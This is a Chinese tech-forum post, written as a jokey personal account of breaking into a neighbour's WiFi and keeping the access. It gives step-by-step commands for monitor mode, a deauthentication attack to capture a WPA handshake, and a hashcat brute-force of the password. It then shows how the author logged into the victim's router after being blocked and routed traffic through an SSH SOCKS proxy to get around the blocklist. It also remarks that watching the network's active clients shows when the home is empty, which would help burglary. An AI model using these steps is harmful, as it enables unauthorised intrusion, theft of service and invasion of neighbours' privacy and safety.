电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1404 人浏览分享

中继中继再中继

[复制链接]
1404 0
1.曲折的WIFI安全之路

当前主流的蹭网方式一般分为四种:
1.发扬人格魅力直接敲门问(本帅深知自己人格魅力过于强大 怕楼上小姐姐爱上我 果断放弃)
2.下载WIFI万能钥匙 看下有没有人上传到服务器。
3.跑握手包
4.跑pin码

基于难易程度及优先级有限下载了几个wifi万能--钥匙 失败了上门问是不可能上门问的 一辈子
都不可能上门问剩下跑PIN码感觉效率不行 果断选择了跑握手包。

1.1跑握手包

跑握手包首选kali 用Windows在断网的情况下搭环境委实爆炸 在为
Windows自动更新贡献20G流量后果断放弃。
打开kali 翻出我积灰已久的无线网卡 顶着严寒开干。
唤起无线网卡
唤起无线网卡
  1. ifconfig  wlan0 up
复制代码

开启监听模式
  1. airmon-ng start wlan0
复制代码

扫描频段
  1. airodump-ng wlan0mon
复制代码

尝试查找WIFI下有活跃用户的节点 这里展开一下 WIFI底下无用户是否可以判定这个时段屋子
里面没人多次观察可以得出WIFI底下的出行规律 利于 窃格瓦拉 。
  1. airodump-ng -c 频段 --bssid MAC地址 -w /dev/null
复制代码

QQ截图20210811111425.png

找到有存活用户的WIFI 对活跃用户进行取消认证攻击 让其重连 这样就可以抓到握手包了。
  1. airodump-ng -c 频段 --bssid MAC地址 -w a.pac #持续抓包
  2. aireplay-ng -0 10 -a wifimac -c 用户mac wlan0mon #取消认证攻击
复制代码

当命令行出现WPA handshake:XXXXXX就代表成功抓到握手包了 可以停止抓包 导出pac文件。

1.2破解密码

windows可以用EWSA 图形化操作 但是有一丝丝的慢 这边选hashcat首先通过官网
把cap包转为hashcat可识别的hccapx包。
  1. 网址:https://hashcat.net/cap2hccapx/
复制代码

hashcat跑起来 先跑纯数字 因为wifi密码至少8位 所以一般贼难跑。暴力破解一般推荐数字先 从8位跑到11位
  1. hashcat.exe -m 2500 -a3 a.hccapx ?d?d?d?d?d?d?d?d
复制代码

跑全字符一般可以告别破WIFI了

1000.png

经过不懈努力 跑了一夜 终于跑出 密码是手机号。

2.无线中继惨遭发现

既然跑出密码 当然是掏出我的斐讯K2无线中继happy地蹭网喽 愉快一夜之后发现清晨MAC就被拉黑了!!!
楼下用户竟然有管理自己的WIFI。本着不抢权限的原则 白天断网一天后 半夜操起自己的电脑继续尝试连接那
个WiFi 发现密码没换,通过密码登陆网关。看一下发现自己的设备果然被拉黑了。

QQ截图20210811111902.png

QQ截图20210811111927.png

都把设备名改成小米智能设备了还拉黑我 看来楼上是个高手。通过查找发现某60路由器有新设备提醒功能还有可能
接入了智能音箱一接入就语音播报。既然有提醒功能 极有可能我的电脑第二天也会被拉黑 正当我就要放弃的时候发
现这款路由器有中继功能并且拥有SSH登录功能。

3.中继中继再中继

既然不能去连接对端热点为什么不让对端连接我们呢,说干就干一番尝试后发现对端连
我的路由器果然不报警拓扑图如下。

QQ截图20210811112053.png

再通过路由配置,关闭内网隔绝,这样我就可以跟对端路由在一个内网了。这样我就可以连接对端SSH通
过SSH proxy进行上网。对端路由在无线中继后有两个上网方式 一个是wan口 一个是中继口 对端路由
选WAN口进行上网 选错了即断网。

QQ截图20210811112159.png

SSH proxy配置
  1. ssh -D 1080 -q -C -N user@ip
复制代码

这样我就可以在本地PC的1080口打开了一个SOCKS5代理再关闭PC防火墙设置让路由可以连接PC的1080口。
在路由配置上设置代理上网设置为PC的IP及端口。这样就可以愉快地上网了。啦啦啦啦啦啦啦啦
写在最后:可惜路由器自身不带SSH功能,这样就可以不用PC了。本来想自己编译一个上传上去使用的
奈何蛋壳年付难民已被房东扫地出门嘤嘤嘤!!!!

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.